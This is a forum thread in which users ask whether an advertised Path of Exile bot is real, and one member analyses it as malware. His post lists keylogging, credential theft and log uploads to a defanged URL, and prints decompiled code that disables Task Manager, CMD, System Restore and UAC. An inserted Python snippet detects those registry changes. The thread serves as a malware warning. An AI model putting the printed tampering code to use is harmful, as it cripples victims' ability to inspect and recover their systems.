Thread: Bot?

  1. #1
    username1001011's Avatar Member

    Bot?

    Hi there

    I stumbled across this: https://www.youtube.com/watch?v=SYz2C_wxwVI

    Is this legit? Malware?

    I wonder if anyone has tried it.
  2. #2
    Augury13's Avatar Legendary
    "Ratings have been disabled for this video." so most likely a scam/malware.

  3. #3
    username1001011's Avatar Member
    Originally Posted by tmanowen View Post
    "Ratings have been disabled for this video." so most likely a scam/malware.
    good point

  4. #4
    ferrokarr's Avatar Member
    Hmmm, "they" have some other interesting hacks too... (PoEEX)
    I will do a sep. VM and check at the weekend.

  5. #5
    SKU's Avatar Contributor
    It's a keylogger, information stealer, and much more. Do not execute.

    Virustotal from the embedded dll: https://www.virustotal.com/en/file/d...is/1369861137/
    Last edited by SKU; 05-29-2013 at 04:00 PM.

  6. #6
    username1001011's Avatar Member
    Originally Posted by SKU View Post
    Well, according to this blog entry, VT isn't all that good - Sarvam Blog: Nearly 70% of Packed Windows System files are labeled as Malware

    Still, if you use a blank external drive with nothing but Win2Go on it and PoE with a new bot account... would it steal the PoE info stuff....
    Last edited by username1001011; 05-30-2013 at 02:02 AM.

  7. #7
    SKU's Avatar Contributor
    Originally Posted by username1001011 View Post
    Well, according to this blog entry, VT isn't all that good - Sarvam Blog: Nearly 70% of Packed Windows System files are labeled as Malware

    Still, if you use a blank external drive with nothing but Win2Go on it and PoE with a new bot account... would it steal the PoE info stuff....
    Did you even read the article? What do packed system files have to do with this?

    When I say it's a keylogger etc., I'm not making an assumption based on the VT output. I looked at the code and saw it.

    Here is a very inconclusive list of nasty stuff this program does:
    - Keylogger using a keyboard hook, in PoEEX Bot::KeyHook::Hook(): KeyHook.KHK = KeyHook.SetWindowsHookEx(WH_KEYBOARD_LL, KeyHook.KHD, (int)value, 0);
    - Uploads logs to hxxp://www.limitlessproducts.org/Limitless/Login/submit_log.php as user=wedge92 in PoEXX Bot::mainFunctions::dispatchConfirmation()
    - Takes screenshots of your computer and E-Mails them, PoEXX Bot::mainFunctions::Email()
    - Forces you to login to your Steam account
    - Forces you to login to Skype, sends Skype messages
    - Visit websites
    - Downloads and executes further stuff, possibly on command, didn't check
    - Gets your Firefox, Chrome, Filezilla, Spotify, MSN, Pidgin, SmartFTP, DynDNS, CoreFTP, ... passwords if they are saved on your computer (recovery settings etc)
    - Spreads itself over Skype
    - Uses the ClassLibrary1 module (the embedded DLL) to do a lot more nasty stuff like disabling your TaskMgr, CMD, etc:

    Code:
    // ClassLibrary1.Functions.Other.Disables
    public static void ControlPanel()
    {
    	try
    	{
    		Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
    	}
    	catch (Exception arg_12_0)
    	{
    		ProjectData.SetProjectError(arg_12_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void FolderOptions()
    {
    	try
    	{
    		Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
    	}
    	catch (Exception arg_12_0)
    	{
    		ProjectData.SetProjectError(arg_12_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void Registry()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void SystemRestore()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void TaskManager()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void Uac()
    {
    	try
    	{
    		Interaction.Shell("C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
    	}
    	catch (Exception arg_12_0)
    	{
    		ProjectData.SetProjectError(arg_12_0);
    		ProjectData.ClearProjectError();
    	}
    }
    
    // ClassLibrary1.Functions.Other.Disables
    public static void Cmd()
    {
    	try
    	{
    		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
    	}
    	catch (Exception arg_24_0)
    	{
    		ProjectData.SetProjectError(arg_24_0);
    		ProjectData.ClearProjectError();
    	}
    }
    I find it great that people don't blindly believe stuff, but really? It's not that hard to look at it yourself, and linking articles that you either didn't read or/nor understand does not help anyone.
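A defender-side check for the registry changes listed in the post above, as an added example that is not part of the thread or of SKU's analysis: it scans `.reg` export text for the seven values the decompiled `Disables` methods write. The names `TAMPER`, `INDEX` and `find_tampering` and the sample export are constructed for illustration.

```python
import re

HKCU_POL = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies"
HKLM_MS = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
# key -> {value name: DWORD written by the decompiled Disables methods in the post}
TAMPER = {
    HKCU_POL + r"\Explorer": {"NoControlPanel": 1, "NoFolderOptions": 1},
    HKCU_POL + r"\System": {"DisableRegistryTools": 1, "DisableTaskMgr": 1},
    r"HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System": {"DisableCMD": 1},
    HKLM_MS + r"\Windows NT\CurrentVersion\SystemRestore": {"DisableSR": 1},
    HKLM_MS + r"\Windows\CurrentVersion\Policies\System": {"EnableLUA": 0},
}
# Registry key and value names are case-insensitive, so index them lower-cased.
INDEX = {k.lower(): {n.lower(): v for n, v in vals.items()} for k, vals in TAMPER.items()}
KEY_RE = re.compile(r"^\[([^\]]+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def find_tampering(reg_text):
    """Return sorted (key, value name, dword) hits found in .reg export text."""
    hits, current = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if (m := KEY_RE.match(line)):
            current = m.group(1)
        elif (m := DWORD_RE.match(line)) and current:
            wanted = INDEX.get(current.lower(), {}).get(m.group(1).lower())
            value = int(m.group(2), 16)
            if wanted is not None and value == wanted:
                hits.append((current, m.group(1), value))
    return sorted(hits)

# Constructed sample in .reg export syntax; real exports are UTF-16LE, decode first.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000005

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"disablecmd"=dword:00000001
'''

if __name__ == "__main__":
    for key, name, value in find_tampering(SAMPLE):
        print(f"{key}\\{name} = {value}")
```

A hit only shows that the value matches what this sample writes; the same values can also be set by legitimate administrative policy, so treat the result as a triage signal.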

  8. #8
    username1001011's Avatar Member
    Originally Posted by SKU View Post
    I looked at the code and saw it.
    Well, there was no mentioning of it before. Thx for your work. Still I wonder if it works or not... and if it does, if all that crap/spy/malware could be removed.

  9. #9
    SKU's Avatar Contributor
    Originally Posted by username1001011 View Post
    Well, there was no mentioning of it before. Thx for your work. Still I wonder if it works or not... and if it does, if all that crap/spy/malware could be removed.
    If you remove all that crap/spy/malware, you have nothing left. There is no PoE bot inside that executable - it has absolutely nothing to do with PoE; it's just malware.

    Rule of thumb: YouTube video advertising a fancy hack-related program (bot, money-hack, gm-hack, speed-hack, ..)? It's malware.

  10. #10
    username1001011's Avatar Member
    Originally Posted by SKU View Post
    Rule of thumb: YouTube video advertising a fancy hack-related program (bot, money-hack, gm-hack, speed-hack, ..)? It's malware.
    You might have a good point there... too bad really

  11. #11
    corererr's Avatar Master Sergeant
    Is there any bot outside? :-)

  12. #12
    username1001011's Avatar Member
    Here someone complains about lots of bots:

    Forum - General Discussion - Holy shoot!!Lots of bots are farming orbs and mirrors!!!!!anyone stop them??? - Path of Exile

    but couldn't really find one yet....

  13. #13
    corererr's Avatar Master Sergeant
    Any news of the bots? I don't find one

  14. #14
    username1001011's Avatar Member
    Originally Posted by corererr View Post
    Any news of the bots? I don't find one
    Have a look here: http://www.ownedcore.com/forums/mmo/...pha-v0-3a.html
